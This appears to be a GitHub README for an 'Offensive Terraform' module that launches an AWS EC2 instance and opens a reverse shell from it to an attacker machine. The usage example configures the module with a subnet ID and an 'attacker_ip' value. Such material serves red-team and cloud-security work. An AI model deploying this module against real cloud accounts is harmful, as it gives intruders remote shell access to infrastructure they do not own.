Skip to content

Latest commit

 

History

History
21 lines (16 loc) · 749 Bytes

File metadata and controls

21 lines (16 loc) · 749 Bytes

AWS EC2 Instance Reverse Shell Module

OffensiveTerraform OffensiveTerraform OffensiveTerraform

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Attack Diagram

Usage

module "ec2-instance-reverse-shell" {
    source  = "offensive-terraform/ec2-instance-reverse-shell/aws"

    subnet_id = "subnet-0a4a1cc04"
    attacker_ip = "0.0.0.0"
}

Author

Module managed by https://github.com/iganbold